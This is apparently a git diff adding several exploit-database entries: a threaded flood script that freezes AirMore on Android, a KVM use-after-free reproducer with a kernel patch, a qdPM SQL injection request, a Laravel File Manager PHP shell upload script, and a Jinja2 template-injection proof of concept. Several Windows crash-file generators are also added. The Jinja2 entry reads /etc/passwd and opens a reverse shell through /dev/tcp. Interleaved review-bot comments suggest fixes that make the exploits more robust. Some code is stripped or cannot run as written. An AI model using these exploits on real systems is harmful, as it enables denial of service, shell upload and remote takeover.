diff --git a/exploits/android/dos/46381.py b/exploits/android/dos/46381.py
new file mode 100755
index 000000000..91e13ca36
--- /dev/null
+++ b/exploits/android/dos/46381.py
@@ -0,0 +1,49 @@
+#!/usr/bin/python
+#coding: utf-8
+
+# ************************************************************************
+# * Author: Marcelo Vázquez (aka s4vitar) *
+# * AirMore 1.6.1 Remote Denial of Service (DoS) & System Freeze *
+# ************************************************************************
+
+# Exploit Title: AirMore 1.6.1 Remote Denial of Service (DoS) & System Freeze
+# Date: 2019-02-14
+# Exploit Author: Marcelo Vázquez (aka s4vitar)
+# Vendor Homepage: https://airmore.com/
+# Software Link: https://airmore.com/download
+# Version: <= AirMore 1.6.1
+# Tested on: Android
+
+import sys, requests, threading, signal
+
+def handler(signum, frame):
+ print '\nFinishing program...\n'
+ sys.exit(0)
+
+if len(sys.argv) != 3:
+ print "\nUsage: python " + sys.argv[0] + " \n"
+ print "Example: python AirMore_dos.py 192.168.1.125 2333\n"
+ sys.exit(0)
+
+def startAttack(url):
+ url_destination = url + '/?Key=PhoneRequestAuthorization'
+ headers = {'Origin': url, 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'es-ES,es;q=0.9,en;q=0.8', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36', 'Content-Type': 'text/plain;charset=UTF-8', 'accept': 'text/plain', 'Referer': url, 'Connection': 'keep-alive'}
+
+ r = requests.post(url_destination, headers=headers)
+
+if __name__ == '__main__':
+
+ signal.signal(signal.SIGINT, handler)
+ url = 'http://' + sys.argv[1] + ':' + sys.argv[2]
+
+ threads = []
+
+ for i in xrange(0, 10000):
+ t = threading.Thread(target=startAttack, args=(url,))
+ threads.append(t)
+
+ for x in threads:
+ x.start()
+
+ for x in threads:
+ x.join()
\ No newline at end of file
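Review bot: The usage message on the `if len(sys.argv) != 3:` branch prints `Usage: python <script>` followed by nothing, so the reader is never told what the two arguments are; the same gap shows up in the `[!!] USAGE: exploit.py` line of 46389.py, the seven bare `#include` lines and the empty `[]` address cells of 46388.txt, and the payload bullets and the whole "Cross-Site Request Forgery" section of 46384.txt. In every case the missing text would have been angle-bracketed, so this looks like tag stripping during rendering rather than what the authors committed, and the stored copies should be checked against the originals before they are relied on. Independently, the `print` statements and `xrange` make this Python 2 only while the shebang is a bare `#!/usr/bin/python`; `#!/usr/bin/env python2` would state the requirement. The `r` bound from `requests.post(...)` in `startAttack` is never read and can simply be dropped.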
diff --git a/exploits/linux/dos/46388.txt b/exploits/linux/dos/46388.txt
new file mode 100644
index 000000000..bce7dac71
--- /dev/null
+++ b/exploits/linux/dos/46388.txt
@@ -0,0 +1,288 @@
+kvm_ioctl_create_device() contains the following code:
+
+ dev = kzalloc(sizeof(*dev), GFP_KERNEL);
+ if (!dev)
+ return -ENOMEM;
+
+ dev->ops = ops;
+ dev->kvm = kvm;
+
+ mutex_lock(&kvm->lock);
+ ret = ops->create(dev, cd->type);
+ if (ret < 0) {
+ mutex_unlock(&kvm->lock);
+ kfree(dev);
+ return ret;
+ }
+ list_add(&dev->vm_node, &kvm->devices);
+ mutex_unlock(&kvm->lock);
+
+ if (ops->init)
+ ops->init(dev);
+
+ ret = anon_inode_getfd(ops->name, &kvm_device_fops, dev, O_RDWR | O_CLOEXEC);
+ if (ret < 0) {
+ mutex_lock(&kvm->lock);
+ list_del(&dev->vm_node);
+ mutex_unlock(&kvm->lock);
+ ops->destroy(dev);
+ return ret;
+ }
+
+ kvm_get_kvm(kvm);
+ cd->fd = ret;
+
+This code:
+
+1. creates a device that holds a reference to the VM object (with a borrowed
+ reference, the VM's refcount has not been bumped yet)
+2. initializes the device
+3. transfers the reference to the device to the caller's file descriptor table
+4. calls kvm_get_kvm() to turn the borrowed reference to the VM into a real
+ reference
+
+The ownership transfer in step 3 must not happen before the reference to the VM
+becomes a proper, non-borrowed reference, which only happens in step 4.
+After step 3, an attacker can close the file descriptor and drop the borrowed
+reference, which can cause the refcount of the kvm object to drop to zero.
+
+Reproducer code:
+
+=================================
+// run as `gcc -o kvm_fd_install kvm_fd_install.c -Wall -pthread && ./kvm_fd_install`
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+static int predicted_fd = -1;
+static volatile int ready = 0;
+
+static void *do_close_predicted_fd(void *dummy) {
+ ready = 1;
+ while (1) close(predicted_fd);
+ return NULL; /*unreachable*/
+}
+
+int main(void) {
+ int kvm = open("/dev/kvm", O_RDWR);
+ if (kvm == -1) err(1, "open kvm");
+ int vm = ioctl(kvm, KVM_CREATE_VM, 0);
+ if (vm < 0) err(1, "KVM_CREATE_VM");
+
+ predicted_fd = dup(0);
+ if (predicted_fd == -1) err(1, "dup");
+ close(predicted_fd);
+
+ pthread_t thread;
+ if (pthread_create(&thread, NULL, do_close_predicted_fd, NULL)) errx(1, "pthread_create");
+ while (ready == 0) /*spin*/;
+
+ struct kvm_create_device cd = {
+ .type = KVM_DEV_TYPE_VFIO,
+ .fd = -1, //outparm
+ .flags = 0
+ };
+ if (ioctl(vm, KVM_CREATE_DEVICE, &cd)) err(1, "KVM_CREATE_DEVICE");
+ printf("created device: %d\n", cd.fd);
+}
+=================================
+
+To reliably reproduce the issue, patch the kernel as follows to widen the race:
+=================================
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index 5ecea812cb6a..d43677044ec0 100644
+--- a/virt/kvm/kvm_main.c
++++ b/virt/kvm/kvm_main.c
+@@ -51,6 +51,7 @@
+ #include
+ #include
+ #include
++#include
+
+ #include
+ #include
+@@ -2970,6 +2971,8 @@ static int kvm_ioctl_create_device(struct kvm *kvm,
+ bool test = cd->flags & KVM_CREATE_DEVICE_TEST;
+ int ret;
+
++ pr_warn("kvm_ioctl_create_device: entry: refcount=%u\n", refcount_read(&kvm->users_count));
++
+ if (cd->type >= ARRAY_SIZE(kvm_device_ops_table))
+ return -ENODEV;
+
+@@ -3000,6 +3003,8 @@ static int kvm_ioctl_create_device(struct kvm *kvm,
+ if (ops->init)
+ ops->init(dev);
+
++ pr_warn("kvm_ioctl_create_device: before anon_inode_getfd: refcount=%u\n", refcount_read(&kvm->users_count));
++
+ ret =
anon_inode_getfd(ops->name, &kvm_device_fops, dev, O_RDWR | O_CLOEXEC);
+ if (ret < 0) {
+ mutex_lock(&kvm->lock);
+@@ -3009,8 +3014,13 @@ static int kvm_ioctl_create_device(struct kvm *kvm,
+ return ret;
+ }
+
++ pr_warn("kvm_ioctl_create_device: after anon_inode_getfd: refcount=%u\n", refcount_read(&kvm->users_count));
++ msleep(100);
++ pr_warn("kvm_ioctl_create_device: after sleeping: refcount=%u\n", refcount_read(&kvm->users_count));
++
+ kvm_get_kvm(kvm);
+ cd->fd = ret;
++ pr_warn("kvm_ioctl_create_device: exiting: refcount=%u\n", refcount_read(&kvm->users_count));
+ return 0;
+ }
+=================================
+
+splat in a patched kernel:
+=================================
+[ 224.536858] kvm_ioctl_create_device: entry: refcount=1
+[ 224.539410] kvm_ioctl_create_device: before anon_inode_getfd: refcount=1
+[ 224.541542] kvm_ioctl_create_device: after anon_inode_getfd: refcount=1
+[ 224.651860] BUG: unable to handle kernel paging request at ffffc900015deb08
+[ 224.653744] #PF error: [normal kernel read fault]
+[ 224.655032] PGD 1ead35067 P4D 1ead35067 PUD 1eaeb6067 PMD 1e2c46067 PTE 0
+[ 224.656834] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN
+[ 224.658364] CPU: 0 PID: 1155 Comm: kvm_fd_install Not tainted 5.0.0-rc3+ #251
+[ 224.660252] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
+[ 224.662551] RIP: 0010:kvm_vm_ioctl+0xd75/0xdd0
+[ 224.663746] Code: c7 c7 a0 f3 a0 a8 e8 53 fa 21 00 bf 64 00 00 00 e8 a0 e5 24 00 be 04 00 00 00 4c 89 ef e8 03 ba 42 00 4c 89 ef e8 cb d8 42 00 <8b> b5 08 9b 00 00 48 c7 c7 00 f4 a0 a8 e8 22 fa 21 00 48 89 ef e8
+[ 224.668662] RSP: 0018:ffff8881e3c3f988 EFLAGS: 00010246
+[ 224.670057] RAX: 0000000000000000 RBX: 1ffff1103c787f36 RCX: ffffffffa6a2c325
+[ 224.671950] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffffc900015deb08
+[ 224.673835] RBP: ffffc900015d5000 R08: fffff520002bbd62 R09: fffff520002bbd62
+[ 224.675731] R10: 0000000000000001 R11: fffff520002bbd61 R12:
ffff8881d65863e0
+[ 224.677615] R13: ffffc900015deb08 R14: ffff8881d65863c8 R15: ffffffffa9653bc0
+[ 224.679506] FS: 00007f11f9500700(0000) GS:ffff8881eb000000(0000) knlGS:0000000000000000
+[ 224.681643] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 224.684886] CR2: ffffc900015deb08 CR3: 00000001dfc20003 CR4: 00000000003606f0
+[ 224.686788] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[ 224.688674] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+[ 224.690565] Call Trace:
+[...]
+[ 224.721351] do_vfs_ioctl+0x134/0x8f0
+[...]
+[ 224.732860] ksys_ioctl+0x70/0x80
+[ 224.733749] __x64_sys_ioctl+0x3d/0x50
+[ 224.734764] do_syscall_64+0x73/0x160
+[ 224.735743] entry_SYSCALL_64_after_hwframe+0x44/0xa9
+[ 224.737092] RIP: 0033:0x7f11f8e21dd7
+[ 224.738048] Code: 00 00 00 48 8b 05 c1 80 2b 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 91 80 2b 00 f7 d8 64 89 01 48
+[ 224.742945] RSP: 002b:00007ffeb6611e58 EFLAGS: 00000202 ORIG_RAX: 0000000000000010
+[ 224.744932] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f11f8e21dd7
+[ 224.746810] RDX: 00007ffeb6611e64 RSI: 00000000c00caee0 RDI: 0000000000000004
+[ 224.748681] RBP: 00007ffeb6611e80 R08: 00007f11f8d40700 R09: 00007f11f8d40700
+[ 224.750556] R10: 00007f11f8d409d0 R11: 0000000000000202 R12: 0000564cddd8a7b0
+[ 224.752433] R13: 00007ffeb6611f60 R14: 0000000000000000 R15: 0000000000000000
+[ 224.754311] Modules linked in: btrfs xor zstd_compress raid6_pq
+[ 224.755904] CR2: ffffc900015deb08
+[ 224.756792] ---[ end trace 670d8a6b1c3ab210 ]---
+=================================
+
+Without the patch, I can still crash a Debian stable distro kernel by running
+the reproducer in a loop (`while true; do ./kvm_fd_install; done`), but it takes
+a while to trigger:
+=================================
+[ 251.054762] BUG: unable to handle kernel NULL pointer dereference at 00000000000000a8
+[
251.057734] IP: [] down_write+0x1b/0x40
+[ 251.059903] PGD 0
+
+[ 251.061455] Oops: 0002 [#1] SMP
+[ 251.062661] Modules linked in: ipt_MASQUERADE nf_nat_masquerade_ipv4 nf_conntrack_netlink nfnetlink xfrm_user xfrm_algo iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 xt_addrtype iptable_filter xt_conntrack nf_nat nf_conntrack br_netfilter bridge stp llc aufs(O) overlay snd_hda_codec_generic kvm_intel snd_hda_intel qxl kvm ttm irqbypass crct10dif_pclmul crc32_pclmul ghash_clmulni_intel drm_kms_helper snd_hda_codec snd_hda_core joydev virtio_balloon snd_hwdep evdev sg snd_pcm 9pnet_virtio serio_raw snd_timer snd button virtio_console binfmt_misc soundcore pcspkr drm 9p 9pnet fscache ip_tables x_tables autofs4 ext4 crc16 jbd2 fscrypto ecb mbcache btrfs crc32c_generic xor hid_generic usbhid hid raid6_pq sr_mod cdrom ata_generic virtio_blk virtio_net crc32c_intel ata_piix aesni_intel uhci_hcd
+[ 251.085764] ehci_pci aes_x86_64 ehci_hcd glue_helper libata lrw gf128mul ablk_helper psmouse i2c_piix4 cryptd virtio_pci usbcore virtio_ring usb_common scsi_mod virtio floppy
+[ 251.090094] CPU: 4 PID: 6392 Comm: kvm_fd_install Tainted: G O 4.9.0-8-amd64 #1 Debian 4.9.130-2
+[ 251.092751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
+[ 251.094947] task: ffff949b676f10c0 task.stack: ffffb79691840000
+[ 251.096524] RIP: 0010:[] [] down_write+0x1b/0x40
+[ 251.098605] RSP: 0018:ffffb79691843bf0 EFLAGS: 00010246
+[ 251.100029] RAX: 00000000000000a8 RBX: 00000000000000a8 RCX: ffffb79691843c28
+[ 251.101904] RDX: ffffffff00000001 RSI: 0000000000000286 RDI: 00000000000000a8
+[ 251.103786] RBP: ffff949b4650b1d8 R08: 0000000000000000 R09: 0000000000000000
+[ 251.105659] R10: ffff949b66a84510 R11: ffffdb9787f9bf80 R12: ffff949b4650b220
+[ 251.107556] R13: ffff949b4650b180 R14: ffffffff96310034 R15: ffff949b4650b180
+[ 251.109423] FS: 0000000000000000(0000) GS:ffff949b73d00000(0000) knlGS:0000000000000000
+[ 251.111560] CS: 0010 DS: 0000 ES: 0000
CR0: 0000000080050033
+[ 251.113081] CR2: 00000000000000a8 CR3: 00000001cf808000 CR4: 0000000000360670
+[ 251.114956] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[ 251.116847] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+[ 251.118718] Stack:
+[ 251.119277] ffff949b67cc0000 ffffffff956933f1 ffffb79691843c00 ffff949b67cc0000
+[ 251.122232] ffff949b67cc0000 ffff949b69ce4b68 ffff949b6a624060 ffff949b693cd740
+[ 251.124294] ffff949b69ce4b68 ffffffffc07410b2 ffff949b67cc0000 0000000000000008
+[ 251.126345] Call Trace:
+[ 251.127015] [] ? debugfs_remove_recursive+0x51/0x1c0
+[ 251.128780] [] ? kvm_put_kvm+0x32/0x1d0 [kvm]
+[ 251.130366] [] ? kvm_vm_release+0x1d/0x30 [kvm]
+[ 251.132000] [] ? __fput+0xd8/0x220
+[ 251.133327] [] ? task_work_run+0x7f/0xa0
+[ 251.134790] [] ? do_exit+0x2d5/0xaf0
+[ 251.136163] [] ? do_group_exit+0x3a/0xa0
+[ 251.137618] [] ? get_signal+0x299/0x640
+[ 251.139056] [] ? do_signal+0x36/0x6a0
+[ 251.140458] [] ? kvm_arch_hardware_disable+0x15/0x40 [kvm]
+[ 251.142324] [] ? __fput+0x17d/0x220
+[ 251.143687] [] ? task_work_run+0x84/0xa0
+[ 251.145156] [] ? exit_to_usermode_loop+0x71/0xb0
+[ 251.146794] [] ? do_syscall_64+0xdd/0xf0
+[ 251.148261] [] ? entry_SYSCALL_64_after_swapgs+0x58/0xc6
+[ 251.150074] Code: 01 74 08 48 c7 43 20 01 00 00 00 5b c3 0f 1f 00 0f 1f 44 00 00 53 48 89 fb e8 b2 df ff ff 48 ba 01 00 00 00 ff ff ff ff 48 89 d8 48 0f c1 10 85 d2 74 05 e8 17 be d2 ff 65 48 8b 04 25 c0 fb
+[ 251.157011] RIP [] down_write+0x1b/0x40
+[ 251.158480] RSP
+[ 251.159418] CR2: 00000000000000a8
+[ 251.160300] ---[ end trace b3803036d037ea83 ]---
+[ 251.161513] Fixing recursive fault but reboot is needed!
+=================================
+
+I have requested a CVE identifier from MITRE, but haven't heard back yet.
+
+I am attaching a suggested patch; here's an inline copy for review (with
+clobbered whitespace):
+
+===========================================
+From 7396c501baf3f066c05a74c790775c2c686be8a7 Mon Sep 17 00:00:00 2001
+From: Jann Horn
+Date: Sat, 26 Jan 2019 01:19:40 +0100
+Subject: [PATCH] kvm: fix temporary refcount drop in kvm_ioctl_create_device()
+
+As soon as we call anon_inode_getfd(), userspace can close the device,
+causing a kvm_put_kvm() call that drops a reference. This means that we
+need to grab a reference for the device before anon_inode_getfd(),
+otherwise the VM can disappear from under us.
+
+Fixes: 852b6d57dc7f ("kvm: add device control API")
+Cc: stable@kernel.org
+Signed-off-by: Jann Horn
+---
+ virt/kvm/kvm_main.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index 5ecea812cb6a..585845203db8 100644
+--- a/virt/kvm/kvm_main.c
++++ b/virt/kvm/kvm_main.c
+@@ -3000,8 +3000,10 @@ static int kvm_ioctl_create_device(struct kvm *kvm,
+ if (ops->init)
+ ops->init(dev);
+
++ kvm_get_kvm(kvm);
+ ret = anon_inode_getfd(ops->name, &kvm_device_fops, dev, O_RDWR | O_CLOEXEC);
+ if (ret < 0) {
++ kvm_put_kvm(kvm);
+ mutex_lock(&kvm->lock);
+ list_del(&dev->vm_node);
+ mutex_unlock(&kvm->lock);
+@@ -3009,7 +3011,6 @@ static int kvm_ioctl_create_device(struct kvm *kvm,
+ return ret;
+ }
+
+- kvm_get_kvm(kvm);
+ cd->fd = ret;
+ return 0;
+ }
+--
+2.20.1.495.gaa96b0ce6b-goog
+===========================================
\ No newline at end of file
diff --git a/exploits/php/webapps/46384.txt b/exploits/php/webapps/46384.txt
new file mode 100644
index 000000000..bd73cab27
--- /dev/null
+++ b/exploits/php/webapps/46384.txt
@@ -0,0 +1,42 @@
+# Exploit Title: MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / CSRF
+# Date: 7/17/2018
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=957
+# Version: 1.1.3
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2018-14575
+
+
+1. Description:
+Creates a trash bin in the ACP where you can recover permanent deleted threads and posts. The thread/post subjects allow XSS and deleted posts can be restored by CSRF.
+
+
+2. Proof of Concept:
+
+Cross-Site Scripting
+
+- Create a new thread with the following subject
+- Permanently delete that thread
+- Alert is located in threads trash bin localhost/[path]/admin/index.php?module=tools-trashbin and localhost/admin/index.php?module=tools-trashbin&action=posts
+
+- Reply to a post and change the subject to the following
+- Permanently delete that post
+- Alert is located in posts trash bin localhost/[path]/admin/index.php?module=tools-trashbin&action=posts
+
+
+Cross-Site Request Forgery
+
+
+
+
+
+
+
+
+
+3. Solution:
+Update to 1.1.4
\ No newline at end of file
diff --git a/exploits/php/webapps/46387.txt b/exploits/php/webapps/46387.txt
new file mode 100644
index 000000000..a33431efd
--- /dev/null
+++ b/exploits/php/webapps/46387.txt
@@ -0,0 +1,36 @@
+===========================================================================================
+# Exploit Title: qdPM 9.1 - 'search_by_extrafields[]' SQL Injection
+# Date: 14-02-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: http://qdpm.net
+# Software Link: http://qdpm.net/download-qdpm-free-project-management
+# Version: v9.1
+# Category: Webapps
+# Tested on: Wamp64, @Win
+# Software description:
+ Free project management tool for small team
+ qdPM is a free web-based project management tool suitable for a
+small team working on multiple projects.
+ It is fully configurable. You can easy manage Projects, Tasks and
+People. Customers interact
+ using a Ticket System that is integrated into Task management.
+===========================================================================================
+# POC - SQLi
+# Parameters : search_by_extrafields[]
+# Attack Pattern : URL encoded POST input search_by_extrafields[] was set to \
+ Error message found : You have an error in your SQL syntax
+# POST Request: http://localhost/qdpm/index.php/users
+===========================================================================================
+POST /qdpm/index.php/users HTTP/1.1
+Content-Length: 45
+Content-Type: application/x-www-form-urlencoded
+Referer: http://localhost/qdPM/
+Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
+Host: localhost
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21
+(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
+Accept: */*
+
+search[keywords]=&search_by_extrafields[]=%5c
\ No newline at end of file
diff --git a/exploits/php/webapps/46389.py b/exploits/php/webapps/46389.py
new file mode 100755
index 000000000..a8589ae27
--- /dev/null
+++ b/exploits/php/webapps/46389.py
@@ -0,0 +1,88 @@
+### Exploit Title: UniSharp Laravel File Manager - Arbitrary File Upload
+##
+## Google Dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io
+## Exploit Author: Mohammad Danish
+## Vendor Homepage: https://github.com/UniSharp/laravel-filemanager
+## Software Link: https://github.com/UniSharp/laravel-filemanager
+## Version: v2.0.0-alpha7 & v.2.0
+##
+## Exploit: UniSharp Laravel File Manager - Arbitrary File Upload
+## Reference: https://github.com/UniSharp/laravel-filemanager/issues/356
+##
+##
+## Issue Description:
+## Larvel File Manager by UniSharp allows Arbitrary File Upload if type is set to Files /laravel-filemanager?type=Files
+##
+##*********************
+##IMPORTANT READ
+##*********************
+## Code is not good written, as I just started learning python
+##
+##**********************
+## [!!] USAGE: exploit.py
+## [!!] USAGE: exploit.py 192.168.100.12 8080 eyJpdiI6IlplemdVaG9FSm9MaXJobEgrYlwvSkhnPT0iLCJ2YWx1ZSI6IkhrZ2R1O..........
+##-----------------------
+##
+
+
+import socket
+import sys
+
+def exploit(host,port,sessionId):
+
+ req = ""
+ req += "POST /laravel-filemanager/upload HTTP/1.1\r\n"
+ req += "Host: "+host+":"+port+"\r\n"
+ req += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0\r\n"
+ req += "Accept: */*\r\n"
+ req += "Accept-Language: en-US,en;q=0.5\r\n"
+ req += "Accept-Encoding: gzip, deflate\r\n"
+ req += "X-Requested-With: XMLHttpRequest\r\n"
+ req += "Referer: http://"+host+":"+port+"/laravel-filemanager?type=Files\r\n"
+ req += "Content-Length: 527\r\n"
+ req += "Content-Type: multipart/form-data; boundary=---------------------------12194679330849\r\n"
+ req += "Cookie:laravel_session="+sessionId+"\r\n"
+ req += "Connection: keep-alive\r\n"
+ req += "\r\n"
+ req += "\r\n"
+
+ req += "-----------------------------260082409123824\r\n"
+ req += 'Content-Disposition: form-data; name="upload[]"; filename="c0w.php"\r\n'
+ req += 'Content-Type: text/plain\r\n\r\n'
+
+ req += 'Happy Hacking!!\r\n'
+ req += "\r\n"
+ req += "-------------------\r\n"
+ req += "-----------------------------260082409123824\r\n"
+ req += 'Content-Disposition: form-data; name="working_dir"\r\n'
+ req += "/1\r\n"
+ req += "-----------------------------260082409123824\r\n"
+ req += 'Content-Disposition: form-data; name="type"\r\n'
+
+ req += "Files\r\n"
+ req += "-----------------------------260082409123824\r\n"
+ req += 'Content-Disposition: form-data; name="_token"\r\n'
+
+ req += "MU5XhVxbrkRnkVJFUHCjdfNSVTKm3qro6OgtWXjy\r\n"
+ req += "-----------------------------260082409123824--\r\n"
+
+ s = socket.socket()
+ int_port = int(port)
+ s.connect((host,int_port))
+## print req
+ s.send(req)
+ response = s.recv(1024)
+ magic = response[-10:]
+ if "OK" in magic:
+ print "[!] Your shell Uploaded successfully to directory /1/c0w.php"
+ else:
+ print "[!]
Either the server is not vulnerable OR \r\n1) Check your laravel_session cookie \r\n2) Change working_dir in this exploit \r\n3) Check _token"
+
+
+
+host = sys.argv[1]
+port = sys.argv[2]
+sessionId = sys.argv[3]
+exploit(host,port,sessionId)
\ No newline at end of file
diff --git a/exploits/python/webapps/46386.py b/exploits/python/webapps/46386.py
new file mode 100755
index 000000000..3cd3b0dac
--- /dev/null
+++ b/exploits/python/webapps/46386.py
@@ -0,0 +1,50 @@
+'''
+# Exploit Title: Jinja2 Command injection from_string function
+# Date: [date]
+# Exploit Author: JameelNabbo
+# Website: Ordina.nl
+# Vendor Homepage: http://jinja.pocoo.org
+# Software Link: https://pypi.org/project/Jinja2/#files
+# Version: 2.10
+# Tested on: Kali Linux
+# CVE-2019-8341
+
+
+// from_string function is prone to SSTI where it takes the "source" parameter as a template object and render it and then return it.
+
+
+//here's an example about the vulnerable code that uses from_string function in order to handle a variable in GET called 'username' and returns Hello {username}:
+'''
+
+import Flask
+import request
+import Jinja2
+
+
+@app.route("/")
+def index():
+ username = request.values.get('username')
+ return Jinja2.from_string('Hello ' + username).render()
+
+
+if __name__ == "__main__":
+ app.run(host='127.0.0.1' , port=4444)
+
+'''
+POC
+//Exploiting the username param
+http://localhost:4444/?username={{4*4}}
+OUTPUT: Hello 16
+
+Reading the /etc/passwd
+
+http://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
+
+
+Getting a reverse shell
+http://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}
+
+
+How to prevent it:
+Never let the user provide template content.
+'''
\ No newline at end of file
diff --git a/exploits/windows/dos/46382.py b/exploits/windows/dos/46382.py
new file mode 100755
index 000000000..5aaeafb64
--- /dev/null
+++ b/exploits/windows/dos/46382.py
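Review bot: `exploit` opens a socket at `s = socket.socket()` and never closes it on any path, and nothing documents what the three string parameters are; wrap the connect/send/recv in `try:` … `finally: s.close()` and add a one-line docstring such as `"""Send one upload request to host:port using the given laravel_session value."""`. `port` is taken straight from `sys.argv`, concatenated into the Host and Referer headers as text, and only converted at `int_port = int(port)` just before `connect`, so a non-numeric value fails late with a bare `ValueError`; converting and validating it once at the top of the function gives a clear error. As with 46381.py the file is Python 2 only (`print` statements, a `str` passed to `s.send`), which the header comment should state.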
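Review bot: The sample under `@app.route("/")` cannot run as written: `app` is never created, and `import Flask`, `import request` and `import Jinja2` are not importable module names (the application object and `request` come from `from flask import Flask, request`, and `from_string` is a method of a `jinja2.Environment` instance, not of the package). The docstring should also say plainly that the defect shown is in the application, which concatenates `username` into the template *source* at `Jinja2.from_string('Hello ' + username)`; as far as I know the library treats template source as trusted by design, so the fix belongs in the caller. The remedy that "Never let the user provide template content" at the end of the file describes is to keep the template fixed and pass the value as a render variable, e.g. `return Environment(autoescape=True).from_string('Hello {{ username }}').render(username=username)` (or Flask's `render_template_string('Hello {{ username }}', username=username)`), and the file would be more useful to readers if it showed that line next to the vulnerable one.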
@@ -0,0 +1,22 @@
+#Exploit Title: Free IP Switcher 3.1 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2018-02-14
+#Vendor Homepage: http://www.eusing.com/index.html
+#Software Link: http://www.eusing.com/ipscan/free_ip_scanner.htm
+#Tested Version: 3.1
+#Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: Free_IP_Switcher_3.1.py
+#2.- Open bd.txt and copy content to clipboard
+#2.- Open Free IP Switcher
+#3.- Select "Network Adapter"
+#4.- In "Additional" enable "Computer Name" and Paste ClipBoard
+#5.- Click on "Activate"
+#6.- Crashed
+
+cod = "\x41" * 240
+
+f = open('ip_code.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46383.py b/exploits/windows/dos/46383.py
new file mode 100755
index 000000000..f30d7a20f
--- /dev/null
+++ b/exploits/windows/dos/46383.py
@@ -0,0 +1,29 @@
+#Exploit Title: Navicat for Oracle 12.1.15 - "Password" Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-02-14
+#Vendor Homepage: https://www.navicat.com/es/
+#Software Link: https://www.navicat.com/es/download/navicat-for-oracle
+#Tested Version: 12.1.15
+#Tested on: Windows 10 Single Language x64/ Windows 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: Navicat_for_Oracle_12.1.15.py
+#2.- Open code.txt and copy content to clipboard
+#2.- Open Navicat for Oracle 12.1.15
+#3.- Select "Conexión"
+#4.- Select "Oracle"
+#5.- In "Nombre de conexión" type "Test"
+#6.- In "Tipo de conexión" select "Basic"
+#7.- In "Host" type 1.1.1.1
+#8.- In "Puerto" type "1521"
+#9.- In "Nombre del servicio" type ORCL
+#10.- In "Nombre de usuario" type "user"
+#11.- In "Contraseña" Paste Clipboard
+#12.- Select "Aceptar"
+#13.- Crashed
+
+cod = "\x41" * 550
+
+f = open('string.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
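Review bot: The steps comment in 46382.py tells the reader to open `bd.txt`, but the script writes `ip_code.txt`; 46383.py has the same mismatch (`code.txt` in its step 2 versus `open('string.txt', 'w')` in the code), and both files number two consecutive steps `#2.-`. Align the filenames in the comments with the `open(...)` calls and renumber the steps so the instructions can be followed as written. Both scripts also open the file without a context manager; `with open('ip_code.txt', 'w') as f: f.write(cod)` closes it even if the write raises. The `#Discovery Date: 2018-02-14` line in 46382.py is a year earlier than the sibling file's `2019-02-14` and the index row's 2019-02-15, which looks like a typo.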
diff --git a/exploits/windows/dos/46385.py b/exploits/windows/dos/46385.py
new file mode 100755
index 000000000..00f486907
--- /dev/null
+++ b/exploits/windows/dos/46385.py
@@ -0,0 +1,26 @@
+# Exploit Title: VSCO 1.1.1.0 - Denial of Service (PoC)
+# Date: 2/14/2018
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://www.microsoft.com/store/productId/9NC1RLNH76PB
+# Version: 1.1.1.0
+# Tested on: Windows 10
+
+# Proof of Concept:
+# Run the python script, it will create a new file "PoC.txt"
+# Copy the text from the generated PoC.txt file to clipboard
+# Paste the text in the top right search bar and hit Search
+# Click back to Home
+# App will now crash
+
+buffer = "A" * 5000
+payload = buffer
+try:
+ f=open("PoC.txt","w")
+ print "[+] Creating %s evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 65deb8a42..9d079c978 100644
